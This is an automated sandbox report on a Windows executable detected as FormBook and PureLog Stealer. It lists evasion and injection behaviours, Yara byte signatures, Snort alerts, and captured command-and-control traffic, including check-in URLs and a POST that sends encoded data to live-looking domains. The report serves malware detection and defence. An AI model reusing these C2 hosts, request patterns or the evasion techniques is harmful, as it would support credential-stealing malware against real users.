Windows Analysis Report
MR-239-1599-A.scr.exe

Overview

General Information

Sample name: MR-239-1599-A.scr.exe
Analysis ID: 1438436
MD5: f53a5b00eaa86439c9bf502a7550f48a
SHA1: e4f80447b09e17553bcbd8925662c9d1d3560ec7
SHA256: f82f959fe8660a9975cbd0255ba069507af5bdb24dc88b47b275ff98fbae0afb
Tags: exe, Formbook
Infos:

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • MR-239-1599-A.scr.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
    • MR-239-1599-A.scr.exe (PID: 7548 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
    • MR-239-1599-A.scr.exe (PID: 7556 cmdline: "C:\Users\user\Desktop\MR-239-1599-A.scr.exe" MD5: F53A5B00EAA86439C9BF502A7550F48A)
      • DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe (PID: 4488 cmdline: "C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7920 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe (PID: 4500 cmdline: "C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8184 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x655b7:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x4eb86:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1654874999.0000000007620000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.MR-239-1599-A.scr.exe.7620000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.MR-239-1599-A.scr.exe.2d8fe28.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.MR-239-1599-A.scr.exe.2d8fe28.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.MR-239-1599-A.scr.exe.7620000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
3.2.MR-239-1599-A.scr.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched
Timestamp: 05/08/24-18:23:04.241190, SID: 2855465, Source Port: 49772, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:21:29.283237, SID: 2855465, Source Port: 49752, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:20:40.991637, SID: 2855465, Source Port: 49743, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:21:13.889976, SID: 2855465, Source Port: 49748, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:22:25.343188, SID: 2855465, Source Port: 49764, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:22:48.893765, SID: 2855465, Source Port: 49768, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:22:02.183176, SID: 2855465, Source Port: 49760, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:23:53.287883, SID: 2855465, Source Port: 49780, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected
Timestamp: 05/08/24-18:23:28.557719, SID: 2855465, Source Port: 49776, Destination Port: 80, Protocol: TCP, Classtype: A Network Trojan was detected

                  AV Detection

                  Source: MR-239-1599-A.scr.exe, ReversingLabs: Detection: 50%
                  Source: Yara match, File source: 3.2.MR-239-1599-A.scr.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 3.2.MR-239-1599-A.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 00000009.00000002.4094770900.0000000004C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000006.00000002.4093386507.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000006.00000002.4091574286.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.1945723633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000006.00000002.4093292133.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.1946088682.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000003.00000002.1948359702.0000000003660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 00000005.00000002.4092996752.0000000004050000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: MR-239-1599-A.scr.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: MR-239-1599-A.scr.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: replace.pdb source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: replace.pdbGCTL source: MR-239-1599-A.scr.exe, 00000003.00000002.1946216464.0000000001067000.00000004.00000020.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092546674.00000000007B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092277586.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033012874.00000000004CE000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: wntdll.pdbUGP source: MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: MR-239-1599-A.scr.exe, MR-239-1599-A.scr.exe, 00000003.00000002.1946410833.00000000014C0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000006.00000003.1946021907.0000000003074000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.000000000357E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000006.00000003.1948153296.000000000322E000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000006.00000002.4093678042.00000000033E0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PIqH.pdb source: MR-239-1599-A.scr.exe
                  Source: Binary string: PIqH.pdbSHA256\;<D source: MR-239-1599-A.scr.exe
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 6_2_02C1BC00 FindFirstFileW,FindNextFileW,FindClose, 6_2_02C1BC00
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 4x nop then xor eax, eax 6_2_02C09460
                  Source: C:\Windows\SysWOW64\replace.exe, Code function: 4x nop then pop edi 6_2_02C1210D

                  Networking

                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49743 -> 79.98.25.1:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49748 -> 64.190.62.22:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49752 -> 217.76.128.34:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49760 -> 178.211.137.59:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49764 -> 203.161.46.103:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49768 -> 162.240.81.18:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49772 -> 103.93.125.69:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49776 -> 3.73.27.108:80
                  Source: Traffic, Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.4:49780 -> 91.195.240.19:80
                  Source: DNS query: www.www60270.xyz
                  Source: Joe Sandbox View, IP Address: 162.240.81.18
                  Source: Joe Sandbox View, IP Address: 79.98.25.1
                  Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
                  Source: Joe Sandbox View, ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK
                  Source: Joe Sandbox View, ASN Name: RACKRAYUABRakrejusLT
                  Source: Joe Sandbox View, ASN Name: ONEANDONE-ASBrauerstrasse48DE
                  Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=ok/gmcxpcerYYESV9LVelGsDrZokr4IbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBb+96LAD/3UXNvlvrkMKLP/jNG9hi36bWzAk=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=jXFvQTK4oWsNW5HZJ/0gKTQct2QKO2STTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZkV7I+j781KbGhsSlxE46GWITw0n47D4H34I=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=heiUU9lLv45IJG5VBKLzBQ/QU5pXOEZ122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUgloq+HQclTA5c3JDTwCxVF3w8TOe3DJCoRyHmQ=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=N0v49flUUQfEWOo8G070d+LLia1Jclps7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sO7KdYvAVPIXxSY0kCkfcGUlYm8H/tBR+N9A=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=1EzsQVnX0vVrGxBbRnBPuNOP8Hn1gSvJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpU5xNXvMTIPZOnLFq5OOndh66TdA/sgsdPCY=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fairmarty.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=mEhw182mTcvL4X7VmCJbLa0KRk630JMb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5Fv1lORSZ/ddJgsC5cmTGFrP+D2MWmLQXjoE=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aprovapapafox.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=/mfxaTJBOgt3JDZn0BatbUHTEszIrcd1tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEuNl9oe0KYtPyQihSGvBT9JqjuFq9ou3hQwM=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.83634.cnConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=qJYbYwaLgLDJAMSEQ5QgE4656+lZvARVMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjUavOuE9Ld2m4gF80zlDT2iLkYInMKGRZjmA=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.valentinaetommaso.itConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global trafficHTTP traffic detected: GET /aleu/?jn4lNb=Fsk+9Ugrf6MFs9mf9XEpMImSOUY5iiqQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUGzAeffoJWz8ACYHJmD8/KtCE1mdCsvc/NZo=&jvudu=jXz4lVThP2GL4N HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.solesense.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                  Source: global traffic, DNS traffic detected: DNS query: www.maxiwalls.com
                  Source: global traffic, DNS traffic detected: DNS query: www.choosejungmann.com
                  Source: global traffic, DNS traffic detected: DNS query: www.paydayloans3.shop
                  Source: global traffic, DNS traffic detected: DNS query: www.colchondealquiler.com
                  Source: global traffic, DNS traffic detected: DNS query: www.www60270.xyz
                  Source: global traffic, DNS traffic detected: DNS query: www.skibinscy-finanse.pl
                  Source: global traffic, DNS traffic detected: DNS query: www.avoshield.com
                  Source: global traffic, DNS traffic detected: DNS query: www.fairmarty.top
                  Source: global traffic, DNS traffic detected: DNS query: www.theertyuiergthjk.homes
                  Source: global traffic, DNS traffic detected: DNS query: www.aprovapapafox.com
                  Source: global traffic, DNS traffic detected: DNS query: www.83634.cn
                  Source: global traffic, DNS traffic detected: DNS query: www.polhi.lol
                  Source: global traffic, DNS traffic detected: DNS query: www.valentinaetommaso.it
                  Source: global traffic, DNS traffic detected: DNS query: www.toyzonetshirts.com
                  Source: global traffic, DNS traffic detected: DNS query: www.solesense.pro
                  Source: global traffic, DNS traffic detected: DNS query: www.onitsuka-ksa.com
                  Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.paydayloans3.shopOrigin: http://www.paydayloans3.shopContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0Connection: closeReferer: http://www.paydayloans3.shop/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 6a 6e 34 6c 4e 62 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 35 41 78 61 64 66 4d 54 7a 6e 48 31 58 50 64 4d 74 33 36 57 37 32 77 33 63 6c 6b 36 57 45 31 41 67 3d 3d Data Ascii: jn4lNb=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CY5AxadfMTznH1XPdMt36W72w3clk6WE1Ag==
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:20 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 
68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 16:21:23 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 
